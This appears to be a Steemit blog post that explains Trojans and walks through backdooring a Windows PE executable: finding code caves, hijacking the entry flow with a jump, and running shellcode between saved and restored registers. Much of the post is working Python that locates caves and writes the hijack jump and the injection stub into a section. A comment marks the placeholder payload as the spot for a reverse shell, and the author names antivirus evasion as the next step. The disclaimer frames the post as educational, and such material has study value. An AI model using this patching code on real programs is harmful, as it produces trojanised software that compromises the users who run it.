[EN] Trojans - A technical overview

in it-security •  7 years ago 

The term "Trojan horse" is used frequently in IT security.
This article briefly describes what a Trojan is and then outlines the basic procedure for creating one.

What is a Trojan?

The name comes from Greek mythology: the Greeks presented the Trojans with a large wooden horse as a supposed peace offering, with warriors hidden inside.

Trojans are malware that looks like normal, useful software.
In addition to the advertised functionality, further program code is executed without the user noticing.

The additional code is added to a "host file" in such a way that the original program still runs without any problems. The malware therefore runs with the rights of the user who starts the host program, and it is often not recognized as malware.


How a Trojan horse is created

The following section is a little more technical.
A basic understanding of how a program is structured (stack, registers, pointers) is assumed.

Disclaimer: I don't want to motivate anyone to create a Trojan to harm others.
It is only intended to show the basic procedure for creating one.

1 Code Cave search

There are basically two ways to bring additional code into a file. Either a new section is added, which has the disadvantage that the file grows and the extra section is conspicuous, or an existing section is reused. For the latter, a code cave is needed: a run of unused bytes (usually the zero padding between the end of a section's real data and the end of its file-aligned size) that can be overwritten without affecting the program.

It is important that the section holding the cave is executable; if the shellcode is encoded and decodes itself in place, the section must also be writable. In a PE file these properties are the section characteristics (IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE); if they are missing, they have to be set in the section header.
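As an added example (not code from the original post), the cave search from step 1 in Python using only the standard library: the section table of a PE file is read, every run of zero bytes of a minimum length is reported with its file offset, the RVA a jump would have to target, and whether the section is executable or writable. The PE file it runs on is a constructed, minimal PE-shaped byte string built by build_sample_pe() (two sections, not a real executable); the flag constants and header layout are the documented PE format, but the section contents, sizes and the min_size threshold are assumptions for the demonstration.

```python
import struct

# PE section characteristic flags (IMAGE_SECTION_HEADER.Characteristics)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_HEADER_FMT = "<8sIIIIIIHHI"   # 40 bytes per IMAGE_SECTION_HEADER


def parse_sections(pe: bytes) -> list:
    """Read the section table of a PE file using only the stdlib."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size            # section headers follow the optional header
    sections = []
    for i in range(n_sections):
        (name, vsize, va, raw_size, raw_ptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from(
            SECTION_HEADER_FMT, pe, table + i * 40)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize, "rva": va,
            "raw_size": raw_size, "raw_ptr": raw_ptr,
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "writable": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return sections


def _zero_runs(buf: bytes, min_size: int):
    """Yield (start, length) of every run of 0x00 bytes at least min_size long."""
    start = None
    for i, b in enumerate(buf):
        if b == 0:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_size:
                yield start, i - start
            start = None
    if start is not None and len(buf) - start >= min_size:
        yield start, len(buf) - start


def find_code_caves(pe: bytes, min_size: int = 64) -> list:
    """List every cave (run of unused zero bytes) in every section, with its file
    offset, the RVA a jump would have to target, and the section's flags."""
    caves = []
    for s in parse_sections(pe):
        if s["raw_size"] == 0:
            continue
        raw = pe[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        for start, length in _zero_runs(raw, min_size):
            caves.append({
                "section": s["name"],
                "file_offset": s["raw_ptr"] + start,
                "rva": s["rva"] + start,       # file offset -> RVA within this section
                "size": length,
                "executable": s["executable"],
                "writable": s["writable"],
            })
    return caves


def build_sample_pe() -> bytes:
    """Constructed, minimal PE-shaped file for the demonstration (not a runnable
    executable): a .text section with 0x120 bytes of code followed by padding, and
    a .data section that is mostly zero-filled but not executable."""
    opt_size = 0xE0                                              # PE32 optional header size
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)     # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    text_hdr = struct.pack(SECTION_HEADER_FMT, b".text", 0x120, 0x1000, 0x200, 0x200,
                           0, 0, 0, 0, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    data_hdr = struct.pack(SECTION_HEADER_FMT, b".data", 0x40, 0x2000, 0x200, 0x400,
                           0, 0, 0, 0, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    headers = (dos + b"PE\0\0" + coff + b"\0" * opt_size + text_hdr + data_hdr).ljust(0x200, b"\0")
    text = (b"\x55\x89\xe5" * 0x60).ljust(0x200, b"\0")   # push ebp; mov ebp,esp ... then 0xE0 zero bytes
    data = (b"A" * 0x40).ljust(0x200, b"\0")
    return headers + text + data


if __name__ == "__main__":
    for c in find_code_caves(build_sample_pe()):
        usable = "usable" if c["executable"] else "not executable"
        print(f'{c["section"]:8} cave at file 0x{c["file_offset"]:x} / RVA 0x{c["rva"]:x}, '
              f'{c["size"]} bytes, {usable}')
```

On the sample file the .data cave is larger, but only the .text cave is in an executable section; the RVA is what the jump in step 2 has to target, since the program runs from its mapped image, not from file offsets.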


2 Program flow hijacking

At one point in the normal program flow, typically near the entry point, one or more instructions are overwritten with a jump to the code cave (step 1 in the graphic). The program then jumps into our part of the section, where the added code is placed. The overwritten bytes must cover whole instructions, and those instructions are noted, because they have to be executed later (step 3.5).

3 Infiltrating malicious code

3.1 Save register

First, the registers (on x86, for example, with pushad and pushfd for the general registers and the flags) must be saved. This ensures that the program can continue to run normally after our code has been executed.

3.2 Inserting malware/shellcode

Shellcode is a sequence of opcodes (machine instructions, so it depends on the processor type), named after its original purpose of opening a shell. Usually a reverse shell is wanted here, so that the infected machine connects back to the attacker.

3.3 Aligning the stack pointer

In order to restore the registers, the stack pointer must point back to the position where the registers were saved. The shellcode usually leaves the stack in a different state, so the difference (ESP before the shellcode minus ESP after it, measured in a debugger) is corrected with an add esp instruction.

3.4 Load register

The registers saved in 3.1 are reloaded (popfd and popad on x86) so that the program can continue to run normally after our code has been executed.

3.5 Restore the overwritten instructions

One or more "regular" instructions of the program were overwritten at the point where the jump to our code was inserted. They are executed here.

3.6 Jump back to normal program code

Now all that is left is to jump to the instruction that follows the overwritten ones, where the original program would have continued. The program then runs normally after our code has been executed.
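As an added example (not code from the original post), steps 2 and 3.1 to 3.6 carried out in Python on one section's raw bytes: a jmp rel32 is written at the hijack point, and the stub placed in the cave saves the registers, runs the payload, corrects ESP, restores the registers, replays the stolen instructions and jumps back. It assumes 32-bit x86 and a PE section whose RVA is known; the section contents, the hijack point, the cave position, the stack delta of 0 and the 16-byte NOP placeholder standing in for real shellcode are all constructed for the demonstration.

```python
import struct

# x86 (32-bit) encodings used by the stub; constructed example, not the page's code
PUSHAD_PUSHFD = b"\x60\x9c"     # save general registers and EFLAGS (step 3.1)
POPFD_POPAD = b"\x9d\x61"       # restore them in reverse order (step 3.4)
NOP = b"\x90"


def jmp_rel32(src_rva: int, dst_rva: int) -> bytes:
    """Encode `jmp rel32` (E9): the displacement is relative to the end of the
    5-byte instruction, so a jump located at src_rva lands on dst_rva."""
    return b"\xE9" + struct.pack("<i", dst_rva - (src_rva + 5))


def jmp_target(code: bytes, off: int, rva: int) -> int:
    """Decode the destination of an E9 jump at file offset `off` whose RVA is `rva`."""
    if code[off] != 0xE9:
        raise ValueError("not a jmp rel32")
    return rva + 5 + struct.unpack_from("<i", code, off + 1)[0]


def build_stub(cave_rva: int, shellcode: bytes, stolen: bytes,
               return_rva: int, stack_delta: int) -> bytes:
    """Steps 3.1 to 3.6 as one contiguous blob that is written into the cave."""
    stub = PUSHAD_PUSHFD                                   # 3.1 save registers
    stub += shellcode                                      # 3.2 the payload
    stub += b"\x81\xc4" + struct.pack("<i", stack_delta)   # 3.3 add esp, imm32
    stub += POPFD_POPAD                                    # 3.4 reload registers
    stub += stolen                                         # 3.5 overwritten instructions
    stub += jmp_rel32(cave_rva + len(stub), return_rva)    # 3.6 back to normal flow
    return stub


def hijack(code: bytes, hijack_off: int, hijack_rva: int, stolen_len: int,
           cave_off: int, cave_rva: int, cave_size: int,
           shellcode: bytes, stack_delta: int = 0) -> bytes:
    """Step 2: replace `stolen_len` bytes at the hijack point with a jump into the
    cave (padded with NOPs) and write the stub there. `code` is one section's raw
    bytes; `hijack_rva` and `cave_rva` are the virtual addresses of the two offsets.
    `stack_delta` is ESP before the payload minus ESP after it, taken from a debugger."""
    if stolen_len < 5:
        raise ValueError("jmp rel32 needs at least 5 bytes at the hijack point")
    stolen = code[hijack_off:hijack_off + stolen_len]
    # Caveat: the stolen bytes must be whole, position-independent instructions
    # (no relative call/jmp, no RIP/EIP-relative access); check this in a disassembler.
    stub = build_stub(cave_rva, shellcode, stolen, hijack_rva + stolen_len, stack_delta)
    if len(stub) > cave_size:
        raise ValueError(f"stub of {len(stub)} bytes does not fit in a {cave_size}-byte cave")
    out = bytearray(code)
    out[hijack_off:hijack_off + stolen_len] = jmp_rel32(hijack_rva, cave_rva).ljust(stolen_len, NOP)
    out[cave_off:cave_off + len(stub)] = stub
    return bytes(out)


def demo_patch():
    """Constructed sample: a section of `push ebp; mov ebp, esp` pairs mapped at
    RVA 0x1000 with a 0xE0-byte cave at offset 0x120. Six bytes (two whole
    instruction pairs) are stolen at offset 0; the payload is a NOP placeholder."""
    code = (b"\x55\x89\xe5" * 0x60).ljust(0x200, b"\0")
    section_rva = 0x1000
    placeholder_shellcode = NOP * 16          # a real payload (e.g. a reverse shell) goes here
    patched = hijack(code, hijack_off=0, hijack_rva=section_rva, stolen_len=6,
                     cave_off=0x120, cave_rva=section_rva + 0x120, cave_size=0xE0,
                     shellcode=placeholder_shellcode, stack_delta=0)
    return code, patched


if __name__ == "__main__":
    original, patched = demo_patch()
    print("hijack jmp  ->", hex(jmp_target(patched, 0, 0x1000)))
    print("return jmp  ->", hex(jmp_target(patched, 0x140, 0x1140)))
    print("stub bytes  :", patched[0x120:0x145].hex())
```

The two jmp_target calls in the usage are the check a practitioner makes after patching: the first jump must land on the cave's RVA and the last one on the byte right after the stolen instructions. Both addresses are RVAs, which is why the code works on image addresses rather than file offsets.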


Further steps

The Trojan horse will probably be recognized by an anti-virus program (the shellcode matches a signature in the vendor's database). The next step would be to protect it from detection by AV programs. This would go beyond the scope of this contribution. I will write a separate article about the detection mechanisms used by AV software.



I hope this more technical contribution was written in an understandable way. If you have any comments or open questions, I will be happy to answer them in the comments.


You are writing some interesting posts, I'll follow. Also one life hack on Steemit: you can use tables in Markdown to write one side in German and the other side in English. The text would be more readable.